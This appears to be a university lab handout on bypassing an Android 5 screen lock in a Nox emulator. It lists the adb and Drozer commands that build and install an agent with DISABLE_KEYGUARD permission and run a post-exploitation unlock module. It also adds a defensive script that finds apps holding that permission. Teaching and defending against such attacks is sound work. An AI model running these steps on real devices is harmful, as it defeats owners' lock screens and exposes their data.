Proj 13x: Bypassing a Screen Lock with Nox (10 pts)
What You Need for This Project
- A Nox Android emulator, with Kali and adb connected to it,
which you prepared in previous projects. The host system can
be either two PCs or one Mac.
Purpose
To bypass a screen lock using a
Drozer agent on an Android 5 device.
Don't use a more recent
Android version or it won't work.
Start Nox
Start Nox. If there is no PIN,
open Settings, Security,
"Screen lock" and assign a PIN
of 1234,
as shown below.
Restart Nox
Close Nox and start it again.
Swipe up but don't enter the PIN,
so you see the lock screen,
as shown below.
Downgrading Java
Drozer can't sign apps with recent Java
versions, so we need to downgrade Java.
Execute these commands to do that.
apt update
apt install openjdk-8-jdk -y
If an "Outdated processor microcode"
box appears, press Enter.
Execute this command to reboot Kali.
reboot
Execute this command to select the default
version of javac, the
Java compiler:
update-alternatives --config javac
Find "java-8" on the list and select it. When
I did it, that was item 2
as shown below.
Execute this command to select the default
version of java:
update-alternatives --config java
Find "java-8" on the list and select it. When
I did it, that was item 2
as shown below.
Building a Drozer App
To build a Drozer app that requests DISABLE_KEYGUARD
permission,
in Kali, in a Terminal, at the # bash prompt,
execute this command:
drozer agent build --permission android.permission.DISABLE_KEYGUARD
The agent is built and placed in the /tmp
directory. Note the path to the agent,
highlighted in the image below.
Connecting with ADB
As you did in previous projects,
connect to your Nox emulator from Kali,
as shown below.
Installing the App
In Kali, in a Terminal, at the # bash prompt,
execute these commands to remove any existing
agent and install the new one. Replace the
path in the second command to match the correct
path on your system.
adb uninstall com.mwr.dz
adb install /tmp/tmpvJw0NB/agent.apk
The agent installs, as shown below.
Starting the App
In Kali, in a Terminal, at the # bash prompt,
execute these commands to start the agent
and forward the TCP port back to Kali.
adb shell am broadcast -n com.mwr.dz/.receivers.Receiver -c com.mwr.dz.START_EMBEDDED
adb forward tcp:31415 tcp:31415
The commands succeed,
as shown below.
Installing Drozer Modules
In Kali, in a Terminal, at the # bash prompt,
execute these commands to launch
Drozer and install the post-exploitation
modules.
drozer console connect
module install post
When Drozer asks for a directory to put the modules
in, enter this directory:
/usr/local/drozer
The modules install,
as shown below.
Unlocking the Phone
In Kali, in a Terminal, at the # bash prompt,
execute this command.
run post.perform.disablelockscreen
The phone is unlocked,
and Drozer returns a
"Done. Check device." message,
as shown below.
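A defender-side check for the permission this project relies on, as an added example that is not part of the original project: it lists installed packages whose "dumpsys package" entry mentions android.permission.DISABLE_KEYGUARD. The "Package [name]" entry layout, the function names and the sample text are assumptions constructed for illustration.

```shell
#!/usr/bin/env bash
# Added example: find packages holding android.permission.DISABLE_KEYGUARD.

PERM='android.permission.DISABLE_KEYGUARD'

# Reads `adb shell dumpsys package` text on stdin, prints one package per line.
# Assumption: each app entry starts with "Package [name]" and its permission
# lines follow before the next entry header.
keyguard_holders() {
  tr -d '\r' | awk -v perm="$PERM" '
    /^[ \t]*Package \[/ {
      s = index($0, "["); e = index($0, "]")
      pkg = substr($0, s + 1, e - s - 1)   # text between the brackets
      next
    }
    # Shared-user entries also list permissions but are not app packages.
    /^[ \t]*SharedUser \[/ { pkg = ""; next }
    pkg != "" && index($0, perm) { print pkg }
  ' | sort -u
}

# Constructed sample, trimmed to the lines that matter (not real device output).
sample_dumpsys() {
  cat <<'EOF'
Packages:
  Package [com.mwr.dz] (2f1a9c30):
    userId=10052 gids=[3003]
    grantedPermissions:
      android.permission.INTERNET
      android.permission.DISABLE_KEYGUARD
  Package [com.example.notes] (1b77e0aa):
    userId=10053 gids=[]
    grantedPermissions:
      android.permission.INTERNET
Shared users:
  SharedUser [android.uid.system] (3c01d2f4):
    grantedPermissions:
      android.permission.DISABLE_KEYGUARD
EOF
}

# Offline demo. Against a device: adb shell dumpsys package | keyguard_holders
sample_dumpsys | keyguard_holders
```

Any package this reports that is not a known system component or an approved app is worth reviewing and removing with adb uninstall.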
Saving a Screen Image
Make sure the "Done. Check device." message
is visible, as shown above.
Save a full-desktop image. On a Mac, press Shift+Command+3. On a PC, press Shift+PrntScrn and paste into Paint.
YOU MUST SUBMIT A FULL-SCREEN IMAGE FOR FULL CREDIT!
Save the image with the filename "YOUR NAME Proj 13x", replacing "YOUR NAME" with your real name.
Turning in your Project
Email the image to
cnit.128sam@gmail.com with the subject line:
Proj 13x from YOUR NAME
Posted 3-20-19